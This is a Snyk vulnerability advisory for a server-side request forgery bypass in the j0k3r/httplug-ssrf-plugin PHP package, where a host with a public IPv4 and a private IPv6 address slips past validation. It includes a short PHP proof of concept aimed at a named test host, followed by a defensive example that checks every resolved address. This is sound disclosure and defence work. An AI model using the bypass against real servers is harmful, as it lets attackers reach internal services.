Server-side Request Forgery (SSRF) Affecting j0k3r/httplug-ssrf-plugin package, versions >=0.0.0


Severity: medium (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of concept

  • Snyk ID: SNYK-PHP-J0K3RHTTPLUGSSRFPLUGIN-8400871
  • Published: 9 Dec 2024
  • Disclosed: 4 Nov 2024
  • Credit: Pierre Rudloff

Introduced: 4 Nov 2024

CVE: not available. CWE-918
First added by Snyk

How to fix?

There is no fixed version for j0k3r/httplug-ssrf-plugin.

Overview

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). When a domain resolves to both a public IPv4 address and a private IPv6 address, the plugin validates the IPv4 address as safe, but the request is then made to the unsafe IPv6 address.

PoC


<?php

use Graby\HttpClient\Plugin\ServerSideRequestForgeryProtection\Options;
use Graby\HttpClient\Plugin\ServerSideRequestForgeryProtection\ServerSideRequestForgeryProtectionPlugin;
use Http\Client\Common\PluginClient;
use Http\Discovery\HttpClientDiscovery;
use Http\Discovery\MessageFactoryDiscovery;

require_once __DIR__ . '/vendor/autoload.php';

$options = new Options();
$options->enablePinDns();
$pluginClient = new PluginClient(
    HttpClientDiscovery::find(),
    [new ServerSideRequestForgeryProtectionPlugin($options)]
);

// No SsrfException is thrown, although this PoC host resolves to a public IPv4
// and a private IPv6 address (see Overview): only the IPv4 answer is validated.
$pluginClient->sendRequest(
    MessageFactoryDiscovery::find()->createRequest('GET', 'http://httplug-ssrf-plugin.netlib.re/')
);
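The defensive counterpart to the scenario above, as an added example that is not part of this advisory or of the j0k3r/httplug-ssrf-plugin project: before connecting, every address a hostname resolves to, A and AAAA records alike, is checked against private and reserved ranges, and the host is refused if any single answer is unsafe. The function names (`isPublicAddress`, `resolveAllAddresses`, `findUnsafeAddresses`) and the injectable resolver are assumptions of this example; the resolver table is constructed from documentation address ranges (RFC 5737, RFC 3849, RFC 4193) so the script runs offline.

```php
<?php
// Added example (not the advisory's or the project's code): validate every
// resolved address, IPv4 and IPv6, rather than stopping at the first answer.

declare(strict_types=1);

/**
 * True only if $ip is a public, routable address. filter_var's
 * NO_PRIV_RANGE / NO_RES_RANGE flags reject RFC 1918 space, loopback,
 * link-local, unique-local IPv6 (fc00::/7) and IPv4-mapped IPv6
 * (::ffff:0:0/96), so a private v4 address hidden inside a v6 literal
 * is also refused.
 */
function isPublicAddress(string $ip): bool
{
    return filter_var(
        $ip,
        FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE
    ) !== false;
}

/**
 * Collect every A and AAAA record for $host. The resolver is injectable
 * (hypothetical parameter for this example) so the check can be exercised
 * offline; the default uses PHP's dns_get_record().
 *
 * @param null|callable(string):list<string> $resolver
 * @return list<string>
 */
function resolveAllAddresses(string $host, ?callable $resolver = null): array
{
    if ($resolver !== null) {
        return $resolver($host);
    }
    $addresses = [];
    foreach (dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $record) {
        if (isset($record['ip'])) {
            $addresses[] = $record['ip'];     // A record
        } elseif (isset($record['ipv6'])) {
            $addresses[] = $record['ipv6'];   // AAAA record
        }
    }
    return $addresses;
}

/**
 * Returns the unsafe addresses for $host; an empty list means the host may
 * be contacted over either address family. A name with no answers at all is
 * reported as unsafe too: refusing is safer than guessing.
 *
 * @return list<string>
 */
function findUnsafeAddresses(string $host, ?callable $resolver = null): array
{
    $addresses = resolveAllAddresses($host, $resolver);
    if ($addresses === []) {
        return ['<no address>'];
    }
    return array_values(array_filter(
        $addresses,
        fn(string $ip): bool => !isPublicAddress($ip)
    ));
}

// Constructed resolver mimicking the advisory's scenario: the same name
// answers with a public IPv4 address and a private IPv6 address. All values
// are documentation/example ranges, not real infrastructure.
$fakeResolver = static function (string $host): array {
    $table = [
        'dual-stack.example' => ['203.0.113.10', 'fd00::1'],     // public v4 + ULA v6: refuse
        'public.example'     => ['203.0.113.11', '2001:db8::1'], // public v4 + public v6: allow
        'mapped.example'     => ['::ffff:127.0.0.1'],            // v4-mapped loopback: refuse
    ];
    return $table[$host] ?? [];
};

foreach (['dual-stack.example', 'public.example', 'mapped.example', 'unknown.example'] as $host) {
    $unsafe = findUnsafeAddresses($host, $fakeResolver);
    printf(
        "%-20s %s\n",
        $host,
        $unsafe === [] ? 'allowed' : 'refused (' . implode(', ', $unsafe) . ')'
    );
}
```

The decisive design point is that the check is a conjunction over all answers, so a public IPv4 record can never vouch for a private IPv6 one. Validating the addresses is still only half of DNS pinning: the connection must then be made to one of the addresses that passed, not to whatever a second lookup inside the HTTP client happens to return.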
